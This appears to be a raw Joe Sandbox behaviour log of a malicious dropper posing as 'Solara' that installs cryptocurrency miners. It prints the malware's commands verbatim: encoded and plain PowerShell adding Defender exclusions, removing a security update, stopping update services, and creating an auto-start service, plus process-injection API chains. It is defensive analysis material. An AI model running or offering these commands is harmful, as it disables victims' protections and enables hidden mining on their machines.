Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8247DCE0 FindFirstFileExW,19_2_0000027E8247DCE0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A8DCE0 FindFirstFileExW,22_2_0000012C42A8DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589BDCE0 FindFirstFileExW,66_2_000001E8589BDCE0
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 140.82.121.4:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 07 Jan 2025 15:05:18 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: B54A:3ACEAD:634088:6E9AF8:677D42AFAccept-Ranges: bytesDate: Tue, 07 Jan 2025 15:05:19 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740040-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1736262319.418474,VS0,VE28Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: c77d44a0548b70c662ebc1f547d9827e16e6f190Expires: Tue, 07 Jan 2025 15:10:19 GMTSource-Age: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 07 Jan 2025 15:05:18 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: sc.exeProcess created: 46
Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,51_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: 52_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589B28C8 NtEnumerateValueKey,NtEnumerateValueKey,66_2_000001E8589B28C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BFB5701_2_04BFB570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08BF3E981_2_08BF3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EEB58011_2_04EEB580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EEB57011_2_04EEB570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08F13A9811_2_08F13A98
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_0270089015_2_02700890
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_0270088015_2_02700880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049AB58017_2_049AB580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049AB57017_2_049AB570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08643A9817_2_08643A98
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8232D0E019_2_0000027E8232D0E0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82321F2C19_2_0000027E82321F2C
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E823338A819_2_0000027E823338A8
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8247DCE019_2_0000027E8247DCE0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82472B2C19_2_0000027E82472B2C
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E824844A819_2_0000027E824844A8
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A31F2C22_2_0000012C42A31F2C
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A438A822_2_0000012C42A438A8
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A3D0E022_2_0000012C42A3D0E0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A82B2C22_2_0000012C42A82B2C
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A944A822_2_0000012C42A944A8
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A8DCE022_2_0000012C42A8DCE0
Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000226C51_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400014D851_2_00000001400014D8
Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000256051_2_0000000140002560
Source: C:\Windows\System32\dialer.exeCode function: 52_2_000000014000226C52_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 52_2_00000001400014D852_2_00000001400014D8
Source: C:\Windows\System32\dialer.exeCode function: 52_2_000000014000256052_2_0000000140002560
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E858981F2C66_2_000001E858981F2C
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589938A866_2_000001E8589938A8
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E85898D0E066_2_000001E85898D0E0
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589B2B2C66_2_000001E8589B2B2C
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589C44A866_2_000001E8589C44A8
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589BDCE066_2_000001E8589BDCE0
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589E1F2C66_2_000001E8589E1F2C
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589F38A866_2_000001E8589F38A8
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589ED0E066_2_000001E8589ED0E0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
Source: Solara.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engineClassification label: mal100.evad.winEXE@146/40@2/2
Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,51_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 52_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,Sleep,52_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,51_2_00000001400019C4
Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,51_2_000000014000226C
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:892:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\eth.exeJump to behavior
Source: Solara.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Solara.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Solara.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Solara.exeReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-82
Source: C:\Users\user\Desktop\Solara.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-82
Source: C:\Users\user\AppData\Local\Temp\kx new.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-82
Source: unknownProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\eth.exe "C:\Users\user\AppData\Local\Temp\eth.exe"
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr.exe "C:\Users\user\AppData\Local\Temp\xmr.exe"
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ARIBLEUL"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\eth.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
